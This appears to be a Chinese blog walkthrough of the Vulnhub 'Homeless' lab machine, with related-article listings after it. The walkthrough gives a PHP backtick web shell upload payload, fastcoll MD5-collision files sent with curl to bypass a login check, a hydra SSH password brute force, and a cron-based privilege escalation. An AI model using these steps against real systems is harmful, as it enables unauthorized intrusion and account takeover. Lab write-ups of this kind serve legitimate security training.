靶机Homeless

最新推荐文章于 2024-10-12 22:42:21 发布
最新推荐文章于 2024-10-12 22:42:21 发布
阅读量458 收藏
点赞数
分类专栏: Vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43940853/article/details/103822178
版权

kali : 192.168.230.236
靶机 : 192.168.230.245
在这里插入图片描述
在这里插入图片描述
打开web网页,查看源码,发现了user-agent信息,后经过测试,抓包后修改user-agent信息会回显,考虑如何利用它

在这里插入图片描述
还是看源码信息,这里有一个位置的图片,访问一下
在这里插入图片描述
如果不是看别人的wp,给我一万年也做不出来
我们需要在agaent字段填上这个图片的字段 “Cyber​​dog Sledding Portal”
在这里插入图片描述
得到一个目录,我们访问一下
在这里插入图片描述
这里的上传限制了上传文件的大小

<?=`ls`;    #这句代码在php里等同于<?php echo `ls`;?>,是这段代码的缩写

在这里插入图片描述
在这里插入图片描述

注意这里一定是反引号,否则无法解析
在这里插入图片描述
这是我的本地测试,一开始我还傻乎乎的用ls,才反应过来我是windows系统
在这里插入图片描述
新姿势,根本不需要system函数,一开始我还在想你怎么知道能解析代码的,后来才发现原来解析代码是由自己控制的,就是那个反引号

在这里插入图片描述
在这里插入图片描述
点击右上角的Need Hint得到源码
在这里插入图片描述
要求post提交的3个参数不能两两相同,但是要求md5的值相同,而且注意比较md5的时候是===,不是==,区别于以前做ctf的时候的0e绕过,这里是行不通的,===会同时判断类型,用数组也是行不通的,这里的三个值都进行了string强制转换,这里要用到几款工具

fastcoll下载链接:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip

tail.exe下载链接:https://www.trisunsoft.com/tail-for-windows.htm

curl.exe下载链接:https://curl.haxx.se/windows/

fastcoll_v1.0.0.5.exe -o jlzj0 jlzj1      #-o参数代表随机生成两个相同MD5的文件
fastcoll_v1.0.0.5.exe -p jlzj1 -o jlzj1to1 jlzj1to2 #-p参数代表根据jlzj1文件随机生成两个相同MD5的文件,注意:生成两个文件的MD5与jlzj1不同
tail.exe -c 128 jlzj1to1 > a #-c 128代表将jlzj00的最后128位写入文件a,这128位正是jlzj1to1与jlzj1的MD5不同的原因
type jlzj0 a > jlzj1to3
curl.exe --data-urlencode username@E:\工具\md5_crash\jlzj1to1 --data-urlencode password@E:\工具\md5_crash\jlzj1to2 --data-urlencode code@E:\工具\md5_crash\jlzj1to3 --data-urlencode "remember=1&login=Login" http://192.168.230.245/d5fa314e8577e3a7b8534a014b4dcb221de823ad/index.php -i

在这里插入图片描述
我们得到了新的admin.php的cookie,直接登陆

在这里插入图片描述
只是一个执行命令的终端,这里直接在输入框里输入命令是不行的,他还会用到上一步骤中的admin.php的session,否则只会跳转到index.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现所有文件没有权限访问,根据作者的提示,直接爆破downfall的ssh

grep '^sec.*' /usr/share/wordlists/rockyou.txt > passwd.txt

hydra -l downfall -P passwd.txt -t 4 192.168.230.245 ssh

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现这是一个定时脚本,每隔一分钟就会执行一次,接下来要做的就是要把提权的命令写到里面让它自动执行
在这里插入图片描述
在这里插入图片描述
提权成功

WuT0ng
关注
专栏目录
Vulnhub靶机Homeless
prettyX的博客
03-29 681
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/homeless-1,215/ 靶机安装环境:VMware 开始 1、靶机IP发现:192.168.1.111 //kali arp-scan -l 2、nmap 扫描,开放80、22端口 3、访问80,通过插件并未发现使用何种CMS 4、查看网页源码,果不其然,有提示,让仔细检...
Homeless靶机渗透测试
weixin_49340699的博客
07-17 335
流程 用netdiscover对目标网段进行主机扫描发现主机192.168.19.151 用nmap对该主机进行端口扫描 上80端口继续进行信息收集 在第一张图片的上方发现了user-agent Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 在爆破目录后得到的robots.txt里面也有提示 还给到了一个线索rockyou 用brupsuite截断后我们构造user-agent看下结果 给到一个回显但与us
MD5碰撞工具fastcoll及其源码,构造前缀碰撞法和王小云等的四篇论文
12-08
压缩包包含了MD5碰撞工具fastcoll,可以较为快速地生成字符串或文件的MD5 碰撞。还包含了fastcoll工具原理——构造前缀碰撞法、md5快速碰撞的论文和王小云的两篇hash碰撞论文,构造前缀碰撞法和md5快速碰撞的论文作者Marc Stevens即是fastcoll工具的作者
快速MD5强碰撞生成器:fastcoll
m0_68483928的博客
08-16 1408
fastcoll是一款专用工具,旨在快速找到两个具有相同MD5哈希值的不同文件。它利用MD5算法的特定弱点,通过数学运算找到不同输入,使它们共享相同的哈希前缀,从而实现强碰撞。 它使用了一种优化算法,能够在短时间内生成两个不同的消息,确保它们的MD5哈希相同。这是通过深入分析MD5的结构和特性,找出可以操控的部分来实现的。
渗透测试之Homeless靶机实战
大方子
11-21 2425
前言 本次靶机难度中等,还是长了很多见识,值得学习 环境准备 下载Homeless靶机:https://download.vulnhub.com/homeless/Homeless.zip 这里我用 virtual box 打开 主机:kali linux 192.168.100.8 靶机 : Homeless靶机 辅助:windows 192.168.100.9 目标:拿下靶机r...
【小工具发现系列-2】fastcoll_v1.0.0.5.exe md5碰撞
m0_73683234的博客
04-01 1269
不管是做ctf题目或者是现实环境中,往往会有md5散列的情况,而ctf中更是有很多题目都会有什么比较字符串不同而md5值相同什么的,这里就可以利用一款小工具,fastcoll_v1.0.0.5.exe。我们一般会用到的就是-p和 -o,-p参数是干什么的呢,其实就是初始输入,我们用-o参数得到的新文件的值都是根据初始的-p输入的文件得到的。由于生成的文件是十六进制编码后的结果,这里用hxd打开,可以看到生成的1.txt和2.txt都有初始的aleicnb。可以看到有两个txt文件生成了,打开看一下。
MD5碰撞工具fastcoll及其源码与相关论文
最新发布
gitblog_09763的博客
10-12 844
MD5碰撞工具fastcoll及其源码与相关论文 MD5碰撞工具fastcoll及其源码与相关论文 MD5碰撞工具fastcoll及其源码与相关论文 项目地址: https://gitcode.com/open-source-to...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
clone-fastcoll:从 http 克隆 fastcoll_v1.0.0.5_source.zip
06-10
克隆-fastcoll 从克隆 fastcoll_v1.0.0.5_source.zip
fastcoll伪造MD5值
10-31
MD5是目前最热门的加密算法,我们通常用MD5值来验证文件的完整性。例如在一些比较正规的下载网站,通常会提供软件的MD5值,这样我们就可以对下载回来的文件用MD5校检软件(如HashX等)做一次MD5校验,以确保我们获得的文件与该站点提供的文件为同一文件。但当两个不同文件的MD5值完全一样时,你还会信任MD5吗? 找出破解MD5加密方法的专家是我国山东大学的王小云教授,这则新闻在以前的软件版块曾详细报道过。但之后MD5的破解一直没有进展,直到最近,国外的科学家研究出了新的MD5碰撞破解方法,可以让两个不同文件的MD5值完全一样,而之前我们一直认为一个文件的MD5值在世界上是独一无二的,这就像一个人克隆了你的指纹然后冒充你一样恐怖! 为了验证MD5值的独一无二性,我们来做一个简单的试验: 在桌面上新建一个文本文档,文件名为“test.txt”,内容为“OfficeBa”。然后将这个文本文档拖动到校验工具HashX中,点击左上角的“Hash File”按钮,得到其MD5值为051cb2917a5b70505e1687dee449c765,然后为文档中的“OfficeBa”加上双引号,保存后再通过HashX进行校检,发现MD5值变成了9ab117400993b70bc9945a9b15749d5d了。可见,一个极细微的变动都会导致文件的MD5值不同! 那么我们能让两个程序文件的MD5一致,却又都能正常运行,并且可以做完全不同的事情么?答案是:“可以!”。要让两个不同文件的MD5值相同,可以通过一款名为fastcoll的小工具来完成我们同样以刚才的test.txt来做试验: -h [--help] 显示选项 -q [--quiet] 简化 -i [-ihv] arg 使用指定的初始值,默认是md5初始值 -p [-prefixfile] arg 使用给定的前缀计算初始值,仍然把数据复制到输出文件中(必须是个文件名) -o [--out] arg 指定输出文件名,此选项必须是最后一个参数,而且两个文件名必须同时指定 默认的是 -o msg1.bin msg2.bin 把解压出来的fastcoll_v1.0.0.5.exe与test.txt放在同一目录,然后在“命令提示符”中输入:“fastcoll_v1.0.0.5.exe -i test.txt -p test.txt -o cbi.exe cbi2.exe”并回车,在同目录中会生成名为cbi.exe和cbi2.exe文件,我们用HashX校验他们的MD5值,可以发现是完全一样的,但是在HashX中用“SHA-1”加密算法进行校验的时候,结果竟然是不同的(SHA-1加密算法生成的结果也是独一无二的)!可见这已经是完全不同的两个文件,但是他们的MD5值竟然完全相同。 如果黑客从网上下载一个工具,给其捆绑上木马,然后通过工具让其MD5值和原文件一样。那么当用户下载了文件后用MD5校验工具进行校验时就会发现带毒文件和原文件MD5值完全一样,就会放心地去运行,结果可想而知。所以,MD5加密已经不再可信!
更改文件MD5值 + 源码.7z FastColl 最新版
07-07
要让两个不同文件的MD5值相同,可以通过一款名为fastcoll的小工具来完成。   PS:我也不知道原理是为什么,有知道的嘛?
MD5碰撞的2个程序.rar
09-11
MD5碰撞的2个程序 MD5碰撞的2个程序
MD5碰撞工具 可以指定MD5值
03-03
真正MD5碰撞工具,压缩包里有2个软件: 1,fastcoll_v1.0.0.5 可以将原文件生成出2个新MD5值相同的文件。 2,文件MD5修改器正式版 可以将原文件,通过碰撞生成指定MD5值的新文件。(不要做坏事哦)
fastcoll工具试用记
weixin_33701617的博客
03-05 1448
2019独角兽企业重金招聘Python工程师标准>>> ...
使用fastcoll生成字符串MD5碰撞
克格莫(有需要的私信)
06-24 7987
打CTF的时候会遇到诸如$a!=$b&&md5($a)===md5($b)的题。 这就要求我们找到这样的两个字符串a和b,内容不同,但md5值相同。这就涉及到md5的碰撞。 我们使用fastcoll来快速生成这种碰撞。 1.建立一个a.txt,内容如下: 2.将这个文件拖到fastcoll_v1.0.0.5.exe上,等于使用fastcoll打开它。 3.fastcoll会自动生成两个文件: 这两个文件内容不同,但是md5值是相同的。 然后我们写一个php脚本根据生成的文件生成碰撞的字符
C语言 构造相同MD5的可执行文件
Qode
06-27 794
文件信息 文件: C:\Users\Administrator\Desktop\md5碰撞生成\a.exe 大小: 2688 字节 MD5: 31ECBC6D0FF16D8157936B7A93E8F0A6 SHA1: A0471A7DD0383D4101A191CC6D7D4AA8B2377D20 CRC32: 10DB9554 文件: C:\Users\Administrator\Deskt...
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值